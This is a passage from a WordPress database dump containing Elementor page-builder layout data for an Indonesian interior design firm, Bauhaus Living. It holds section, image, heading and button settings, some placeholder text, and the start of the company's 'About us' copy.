\\n\",\"numerical_order\":\"02\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"24d2339\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-1.png\",\"id\":3838,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":57,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"65\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_inline_size_tablet\":50,\"align_tablet\":\"center\",\"background_position_tablet\":\"initial\",\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":60,\"sizes\":[]},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"content_position_tablet\":\"top\",\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-1000,\"sizes\":[]},\"animation_delay\":500},\"elements\":[{\"id\":\"0f2ef7d\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-development\",\"library\":\"flaticon\"},\"text\":\"Design\\ndevelopment\",\"numerical_order\":\"03\",\"top_order\":{\"unit\":\"px\",\"size\":-27,\"sizes\":[]},\"_element_width_mobile\":\"auto\",\"bottom_mobile\":{\"unit\":\"px\",\"size\":175,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true},{\"id\":\"d6ce61d\",\"elType\":\"column\",\"settings\":{\"_column_size\":25,\"_inline_size\":null,\"animation\":\"fadeInDown\",\"animation_tablet\":\"none\",\"_inline_size_tablet\":50,\"content_position_tablet\":\"bottom\",\"align_tablet\":\"center\",\"background_background\":\"classic\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/line-2.png\",\"id\":3839,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_position_tablet\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"px\",\"size\":45,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_ypos\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"px\",\"size\":140,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":-100,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"55\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"60\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false},\"animation_delay\":750},\"elements\":[{\"id\":\"020e37a\",\"elType\":\"widget\",\"settings\":{\"icon\":{\"value\":\"flaticon flaticon-construction\",\"library\":\"flaticon\"},\"text\":\"Construction\\ndevelopment\",\"numerical_order\":\"04\",\"text_position\":\"top-left\",\"_element_width_mobile\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_ova_icon_box_2\"}],\"isInner\":true}],\"isInner\":true}],\"isInner\":false}],\"isInner\":false},{\"id\":\"cbd0171\",\"elType\":\"section\",\"settings\":{\"structure\":\"60\",\"background_background\":\"classic\",\"background_color\":\"#242424\",\"padding\":{\"unit\":\"px\",\"top\":\"50\",\"right\":\"0\",\"bottom\":\"50\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"0137b13\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.178,\"_inline_size_tablet\":33,\"background_background\":\"classic\",\"background_image\":{\"url\":\"\",\"id\":\"\",\"alt\":\"\",\"source\":\"library\"},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"5387f04\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/01-test.png\",\"id\":1901,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"0238cd9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":16.427,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"2140ada\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/02-home1.png\",\"id\":1903,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"22014c4\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":15.06,\"_inline_size_tablet\":33,\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"812d896\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/03-home1.png\",\"id\":1904,\"alt\":\"\",\"source\":\"library\"},\"align\":\"left\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"282c361\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":13.587,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"7e86368\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/04-home1.png\",\"id\":1905,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"44b0fc9\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":17.368,\"_inline_size_tablet\":33,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"78697fd\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/05-home1.png\",\"id\":1906,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false},{\"id\":\"861133d\",\"elType\":\"column\",\"settings\":{\"_column_size\":16,\"_inline_size\":18.375,\"_inline_size_tablet\":33},\"elements\":[{\"id\":\"10e265f\",\"elType\":\"widget\",\"settings\":{\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/06-home1.png\",\"id\":1907,\"alt\":\"\",\"source\":\"library\"},\"align\":\"right\",\"align_tablet\":\"center\"},\"elements\":[],\"widgetType\":\"image\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"9e0e567\",\"elType\":\"section\",\"settings\":{\"margin\":{\"unit\":\"px\",\"top\":\"107\",\"right\":0,\"bottom\":\"80\",\"left\":0,\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"67\",\"right\":0,\"bottom\":\"50\",\"left\":0,\"isLinked\":false}},\"elements\":[{\"id\":\"5ed1170\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"bb1865f\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Direct from the blog posts\",\"title\":\"\\nCheckout our latest news\\nand articles\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":50,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":16,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"600\",\"content_typography_sub_title_letter_spacing\":{\"unit\":\"px\",\"size\":2.2,\"sizes\":[]},\"_padding\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"20\",\"bottom\":\"0\",\"left\":\"20\",\"isLinked\":false},\"_padding_tablet\":{\"unit\":\"%\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"_padding_mobile\":{\"unit\":\"%\",\"top\":\"\",\"right\":\"\",\"bottom\":\"\",\"left\":\"\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"25f2c71\",\"elType\":\"widget\",\"settings\":[],\"elements\":[],\"widgetType\":\"retirio_elementor_blog_grid_2\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"7a90e77\",\"elType\":\"section\",\"settings\":{\"structure\":\"22\",\"gap\":\"no\",\"background_background\":\"classic\",\"background_color\":\"#E3B25A\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/background-get-interior.png\",\"id\":1896,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"initial\",\"background_xpos\":{\"unit\":\"px\",\"size\":1,\"sizes\":[]},\"background_xpos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_xpos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos\":{\"unit\":\"%\",\"size\":80,\"sizes\":[]},\"background_ypos_tablet\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_ypos_mobile\":{\"unit\":\"%\",\"size\":0,\"sizes\":[]},\"background_repeat\":\"no-repeat\",\"padding\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"80\",\"left\":\"0\",\"isLinked\":false},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"10\",\"bottom\":\"80\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"f4bedba\",\"elType\":\"column\",\"settings\":{\"_column_size\":66,\"_inline_size\":null,\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"30\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"4440af1\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"Hire us for your new projects\",\"title\":\"Get interior designs right now\",\"align_heading\":\"left\",\"content_typography_title_typography\":\"custom\",\"content_typography_title_font_size\":{\"unit\":\"px\",\"size\":40,\"sizes\":[]},\"content_typography_title_font_weight\":\"800\",\"color_title\":\"#FFFFFF\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"content_typography_sub_title_typography\":\"custom\",\"content_typography_sub_title_font_size\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"content_typography_sub_title_font_weight\":\"400\",\"content_typography_sub_title_text_transform\":\"none\",\"color_sub_title\":\"#FFFFFF\"},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"}],\"isInner\":false},{\"id\":\"e99860c\",\"elType\":\"column\",\"settings\":{\"_column_size\":33,\"_inline_size\":null,\"content_position\":\"center\",\"align\":\"center\",\"align_mobile\":\"flex-start\"},\"elements\":[{\"id\":\"8cfb32b\",\"elType\":\"widget\",\"settings\":{\"text\":\"contact with us\",\"typography_typography\":\"custom\",\"typography_text_transform\":\"uppercase\",\"background_color\":\"#242424\",\"hover_color\":\"#E3B25A\",\"text_padding\":{\"unit\":\"px\",\"top\":\"18\",\"right\":\"40\",\"bottom\":\"18\",\"left\":\"40\",\"isLinked\":false},\"button_bg_hover\":\"#FFFFFF\",\"button_before_width\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"button_before_height\":{\"unit\":\"px\",\"size\":8,\"sizes\":[]},\"_element_width\":\"auto\",\"_element_vertical_align\":\"center\",\"link\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/contact\\/\",\"is_external\":\"\",\"nofollow\":\"\",\"custom_attributes\":\"\"},\"typography_font_size\":{\"unit\":\"px\",\"size\":12,\"sizes\":[]},\"typography_font_weight\":\"800\",\"border_radius\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true}},\"elements\":[],\"widgetType\":\"button\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"e200d46\",\"elType\":\"section\",\"settings\":[],\"elements\":[{\"id\":\"571494c\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"178b61f\",\"elType\":\"widget\",\"settings\":{\"selected_icon\":{\"value\":\"flaticon flaticon-buildings\",\"library\":\"flaticon\"},\"title_text\":\"This is the heading\",\"description_text\":\"Lorem ipsum dolor sit amet, consectetur adipiscing elit. Ut elit tellus, luctus nec ullamcorper mattis, pulvinar dapibus leo.\"},\"elements\":[],\"widgetType\":\"icon-box\"}],\"isInner\":false}],\"isInner\":false}]'),(4026,4893,'_elementor_page_assets','a:1:{s:6:\"styles\";a:15:{i:0;s:12:\"e-animations\";i:1;s:12:\"e-animations\";i:2;s:12:\"e-animations\";i:3;s:12:\"e-animations\";i:4;s:12:\"e-animations\";i:5;s:12:\"e-animations\";i:6;s:12:\"e-animations\";i:7;s:12:\"e-animations\";i:8;s:12:\"e-animations\";i:9;s:12:\"e-animations\";i:10;s:12:\"e-animations\";i:11;s:12:\"e-animations\";i:12;s:12:\"e-animations\";i:13;s:12:\"e-animations\";i:14;s:12:\"e-animations\";}}'),(4027,4893,'_elementor_pro_version','3.8.1'),(4029,4895,'_wp_page_template','elementor_header_footer'),(4030,4895,'_elementor_edit_mode','builder'),(4031,4895,'_elementor_template_type','wp-page'),(4032,4895,'_elementor_version','3.8.1'),(4033,4895,'_elementor_data','[{\"id\":\"98d9991\",\"elType\":\"section\",\"settings\":{\"layout\":\"full_width\",\"gap\":\"no\",\"margin\":{\"unit\":\"px\",\"top\":\"-142\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"background_background\":\"classic\",\"background_color\":\"#242424\"},\"elements\":[{\"id\":\"623fbca\",\"elType\":\"column\",\"settings\":{\"_column_size\":100,\"_inline_size\":null},\"elements\":[{\"id\":\"911d45f\",\"elType\":\"widget\",\"settings\":{\"revslidertitle\":\"Home 1\",\"shortcode\":\"[rev_slider alias=\\\"home-1\\\" slidertitle=\\\"Home 1\\\"][\\/rev_slider]\"},\"elements\":[],\"widgetType\":\"slider_revolution\"}],\"isInner\":false}],\"isInner\":false},{\"id\":\"8a4764c\",\"elType\":\"section\",\"settings\":{\"custom_height\":{\"unit\":\"px\",\"size\":500,\"sizes\":[]},\"overflow\":\"hidden\",\"structure\":\"20\",\"background_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_position\":\"bottom right\",\"background_repeat\":\"no-repeat\",\"background_size\":\"auto\",\"margin\":{\"unit\":\"px\",\"top\":\"110\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":0,\"bottom\":\"0\",\"left\":0,\"isLinked\":false},\"padding\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"140\",\"left\":\"0\",\"isLinked\":false},\"background_overlay_background\":\"classic\",\"background_overlay_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/aboutbg.png\",\"id\":2075,\"alt\":\"\",\"source\":\"library\"},\"background_overlay_position\":\"bottom right\",\"background_overlay_repeat\":\"no-repeat\",\"background_overlay_opacity\":{\"unit\":\"px\",\"size\":0.7,\"sizes\":[]},\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"90\",\"left\":\"0\",\"isLinked\":false},\"padding_mobile\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false},\"gap\":\"no\"},\"elements\":[{\"id\":\"50ec226\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"content_position\":\"top\",\"align\":\"flex-end\",\"margin\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"40\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":true},\"margin_mobile\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[{\"id\":\"001316b\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-01.svg\",\"id\":2954,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/decor-home-1-about-interior.jpg\",\"id\":4387,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_alignment\":\"right\",\"image_alignment_tablet\":\"center\",\"_animation\":\"fadeInRight\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"image_width_template1_type1\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"auto\"},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"b2ff890\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927c-scaled.jpg\",\"id\":4791,\"alt\":\"\",\"source\":\"library\"},\"image_width\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"image_height\":{\"unit\":\"px\",\"size\":520,\"sizes\":[]},\"image_display\":\"inline-flex\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":-53,\"sizes\":[]},\"_offset_y\":{\"unit\":\"px\",\"size\":-148,\"sizes\":[]},\"_offset_x_tablet\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_x_end_tablet\":{\"unit\":\"px\",\"size\":-10,\"sizes\":[]},\"_animation\":\"fadeInLeft\",\"_animation_tablet\":\"none\",\"text_left\":\"ARCHITECT\",\"_offset_x_end_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_transform_rotateZ_effect_hover\":{\"unit\":\"px\",\"size\":360,\"sizes\":[]},\"_transform_rotateX_effect_hover\":{\"unit\":\"px\",\"size\":14,\"sizes\":[]},\"_transform_translateX_effect_hover\":{\"unit\":\"px\",\"size\":-200,\"sizes\":[]},\"_transform_scale_effect_hover\":{\"unit\":\"px\",\"size\":2,\"sizes\":[]},\"_transform_transition_hover\":{\"unit\":\"px\",\"size\":1000,\"sizes\":[]},\"template_type\":\"type2\",\"image_width_template1_type2_no_border\":{\"unit\":\"px\",\"size\":470,\"sizes\":[]},\"_element_width\":\"inherit\",\"_offset_x_end\":{\"unit\":\"px\",\"size\":-0.2,\"sizes\":[]},\"_element_width_mobile\":\"inherit\",\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":0,\"sizes\":[]},\"_offset_y_mobile\":{\"unit\":\"px\",\"size\":-147,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-100,\"sizes\":[]},\"_offset_y_end_tablet\":{\"unit\":\"px\",\"size\":-167,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-131,\"sizes\":[]},\"image_width_template1_type2_no_border_tablet\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"image_width_template1_type2_no_border_mobile\":{\"unit\":\"%\",\"size\":\"\",\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":-53},\"_offset_y_end_widescreen\":{\"size\":-100}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"0584a9d\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-1065.jpg\",\"id\":4787,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":13,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":10,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":20,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":200,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"60b9817\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-2927.jpg\",\"id\":4788,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":115,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":77,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-20,\"sizes\":[]},\"_offset_y_end_mobile\":{\"unit\":\"px\",\"size\":-5,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]},\"_offset_x_widescreen\":{\"size\":114},\"_offset_y_end_widescreen\":{\"size\":-20}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"},{\"id\":\"79c1a30\",\"elType\":\"widget\",\"settings\":{\"mask_image\":{\"url\":\"https:\\/\\/demo.ovatheme.com\\/retirio\\/wp-content\\/uploads\\/2022\\/06\\/mask-img-02.svg\",\"id\":2955,\"alt\":\"\",\"source\":\"library\"},\"image\":{\"url\":\"https:\\/\\/bauhaus.futuremediatrix.com\\/wp-content\\/uploads\\/2023\\/05\\/IMG-9402.jpg\",\"id\":4790,\"alt\":\"\",\"source\":\"library\"},\"image_width_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_height_template_2\":{\"unit\":\"px\",\"size\":170,\"sizes\":[]},\"image_border\":{\"unit\":\"px\",\"size\":7,\"sizes\":[]},\"border_color\":\"#FFFFFF\",\"text_left\":\"ARCHITECT\",\"_element_width\":\"auto\",\"_position\":\"absolute\",\"_offset_x\":{\"unit\":\"px\",\"size\":216,\"sizes\":[]},\"_offset_x_mobile\":{\"unit\":\"px\",\"size\":135,\"sizes\":[]},\"_offset_x_end\":{\"unit\":\"px\",\"size\":80,\"sizes\":[]},\"_offset_orientation_v\":\"end\",\"_offset_y_end\":{\"unit\":\"px\",\"size\":-59,\"sizes\":[]},\"_animation\":\"fadeInUp\",\"_animation_tablet\":\"none\",\"_animation_delay\":400,\"template_type\":\"type2\",\"show_border\":\"yes\",\"image_width_template1_type2_mobile\":{\"unit\":\"px\",\"size\":130,\"sizes\":[]}},\"elements\":[],\"widgetType\":\"retirio_elementor_image\"}],\"isInner\":false},{\"id\":\"05b98db\",\"elType\":\"column\",\"settings\":{\"_column_size\":50,\"_inline_size\":null,\"_inline_size_tablet\":100,\"margin\":{\"unit\":\"px\",\"top\":\"60\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"margin_tablet\":{\"unit\":\"px\",\"top\":\"80\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"0\",\"isLinked\":false},\"animation\":\"slideInRight\",\"animation_tablet\":\"none\",\"animation_duration\":\"slow\",\"animation_delay\":100,\"padding_tablet\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"10\",\"bottom\":\"0\",\"left\":\"10\",\"isLinked\":false}},\"elements\":[{\"id\":\"2659e25\",\"elType\":\"widget\",\"settings\":{\"sub_title\":\"ABOUT US\",\"title\":\"WELCOME TO BAUHAUS\",\"align_heading\":\"left\",\"margin_title\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"23\",\"left\":\"0\",\"isLinked\":false}},\"elements\":[],\"widgetType\":\"retirio_elementor_heading\"},{\"id\":\"d5a8088\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>\\\"Let\'s turn your ideas into reality\\\"<\\/p>\",\"text_color\":\"#050404\",\"typography_typography\":\"custom\",\"typography_font_size\":{\"unit\":\"px\",\"size\":18,\"sizes\":[]},\"typography_font_weight\":\"bold\",\"_padding\":{\"unit\":\"px\",\"top\":\"5\",\"right\":\"0\",\"bottom\":\"5\",\"left\":\"30\",\"isLinked\":false},\"_border_border\":\"solid\",\"_border_width\":{\"unit\":\"px\",\"top\":\"0\",\"right\":\"0\",\"bottom\":\"0\",\"left\":\"4\",\"isLinked\":false},\"_border_color\":\"#E3B25A\",\"_background_background\":\"classic\",\"_background_color\":\"#FDFDFD\",\"_box_shadow_box_shadow_type\":\"yes\",\"_box_shadow_box_shadow\":{\"horizontal\":5,\"vertical\":6,\"blur\":10,\"spread\":-3,\"color\":\"rgba(0, 0, 0, 0.32)\"}},\"elements\":[],\"widgetType\":\"text-editor\"},{\"id\":\"ae9c19e\",\"elType\":\"widget\",\"settings\":{\"editor\":\"<p>Bauhaus Living adalah interior design consultant &amp; contractor yang telah berdiri sejak tahun 2005.<\\/p><p>Kami telah menangani 300+ proyek residential dan commercial di Jakarta dan sekitarnya.<\\/p><p>Misi kami adalah mengubah interior tempat tinggal maupun tempat kerja agar selain nyaman juga mewakili kepribadian 